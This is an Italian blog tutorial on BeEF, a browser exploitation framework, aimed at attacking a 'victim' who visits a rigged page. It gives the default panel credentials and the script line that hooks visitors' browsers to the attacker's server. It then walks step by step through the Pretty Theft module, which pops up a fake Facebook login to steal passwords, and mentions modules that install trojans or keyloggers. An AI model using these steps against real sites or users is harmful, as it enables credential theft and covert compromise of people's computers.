Prendere il controllo di un computer tramite il browser

Esistono decine di metodi con cui è possibile entrare in un computer e prenderne il pieno controllo, sottraendo password, file, caratteri digitati sulla tastiera e così via. All’interno di questo articolo vi voglio mostrare come sia possibile violare un computer durante una semplice navigazione sul Web da parte della “vittima”, la quale potrebbe essere indotta a visitare un determinato sito Web contenente del codice malevolo non rilevabile da parte di antivirus e firewall.
Per fare ciò ci andremmo ad avvalere di un potente strumento chiamato BeEF (Browser Exploitation Framework), presente nella maggior parte delle distribuzioni di Linux dedicate al pentesting, ma che potremmo utilizzare su qualsiasi computer o VPS. Il mio consiglio è quello di acquistare per pochi Euro una VPS ed installare BeEF. In alternativa, se non volete spendere nemmeno un centesimo, potete scaricare Kali ed installarlo su una macchina virtuale, così da poter giocare con questo strumento senza troppi problemi.
Qualsiasi sia la soluzione da voi scelta, lo scopo di BeEF è quello di permettere l’inserimento di un codice malevolo all’interno di qualsiasi pagina Web (teoricamente anche questa che state leggendo 🙂 ) che avrà il compito di collegare in modo “silenzioso” il vostro browser alla piattaforma di controllo di BeEF.

Ma come si inizia un attacco con BeEF? Dopo aver installato il framework è sufficiente accedere tramite il vostro browser al pannello di controllo (generalmente puntato su: https://127.0.0.1:3000/ui/panel/) con username e password di default (ovvero “beef” per entrambi). Oltre a ciò è necessario inserire una riga di codice all’interno della pagina Web (o dell’intero sito) che vogliamo usare come vettore d’attacco. La stringa di codice è la seguente ed è riportata all’interno del pannello di controllo di BeEF:

<script src=”https://<IP-BeEF>:3000/hook.js”></script>

Questa semplice linea di codice permetterà, come già detto, di collegare l’utente al framework. Dal vostro pannello di controllo, infatti, inizierete a visualizzare la lista di tutti i client che in quel momento si trovano all’interno della pagina Web infettata, come mostrato nello screenshot qui sotto riportato.

A questo punto possiamo iniziare a fare un po’ di cose simpatiche, come per esempio visualizzare il sistema operativo dell’utente, quali plugin ha installato all’interno del proprio browser, il sistema operativo utilizzato, il browser utilizzato e così via. Informazioni che in realtà potrebbero essere recuperate anche in altri modi, ma che ci permettono già di avere idea di chi abbiamo dall’altra parte del monitor.
Passiamo adesso all’attacco vero e proprio. Facciamo click dall’elenco presente sul lato sinistro sull’utente che vogliamo attaccare. Fatto click sul client, sul lato destro della pagina vedrete un riepilogo di tutte le informazioni recuperate dall’utente di cui poco sopra vi parlavo e l’interessante scheda “Commands”, quella che ci permetterà di iniziare l’hacking. Facendo click su tale voce, infatti, avremmo a disposizione decine e decine di strumenti di attacco differenti. Starà solo a voi scegliere di che cosa avete bisogno. Per questo articolo vi mostrerò come sia possibile recuperare la password di accesso a Facebook.

Abbiamo selezionato la nostra vittima, ci siamo recati all’interno della scheda “Commands” ed adesso ci spostiamo all’interno della cartella “Social Engineering”, dove abbiamo a disposizione una serie di attacchi basati, come il nome stesso ci fa intuire, sull’ingegneria sociale. Da questa scheda selezioniamo il plugin “Pretty Theft”, il quale ci permetterà di realizzare un pochissimi istanti un modulo di phishing che verrà inserito all’interno della pagina Web che l’utente sta in quel momento visitando. Dal lato destro del nostro pannello di controllo possiamo infatti scegliere quale tipologia di servizio sottoporre a phishing. Nel nostro caso selezioniamo “Facebook”. Confermiamo l’operazione tramite il bottone “Execute”.

A questo punto, come da screenshot qui sopra mostrato, la nostra vittima si vedrà apparire un modulo di login Facebook (la pagina di sfondo sarà ovviamente il vostro sito Web, in questo caso si tratta di una semplice pagina di test), avvisando l’utente di essersi scollegato a causa di un time-out. Nel momento in cui andrà ad inserire i propri dati il modulo sparirà e dal pannello di controllo di BeEF potrete leggere i dati inseriti dalla vittima 😀
Anche in questo caso vi allego lo screenshot qui di seguito di quello che verrà visualizzato all’interno del vostro pannello.

Grazie ai vari plugin messi a disposizione all’interno di BeEF (molti dei quali possono anche essere scaricati con una semplice ricerca su Google), potrete compiere attacchi molto più complessi ed invasivi di un semplice attacco di phishing. Alcuni moduli vi permetteranno infatti di scaricare ed eseguire un software in background, installando così, per esempio, un trojan oppure un keylogger.

7 commenti
  1. Per contrastare tutto questo cosa si può fare? Da come lo spieghi purtroppo sembra,la,fine del www ( non di internet) Grazie.

      1. Ciao Mauro, mi era sfuggito il tuo commento!
        Il miglior metodo è quello di tenere aggiornato il browser e non cascare in tranelli come quello del phishing di Facebook!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Articoli simili
Continua

Recuperare messaggi Whatsapp

Nell’articolo di oggi andremmo a vedere come recuperare messaggi Whatsapp, anche se cancellati, dal proprio smartphone, sia esso…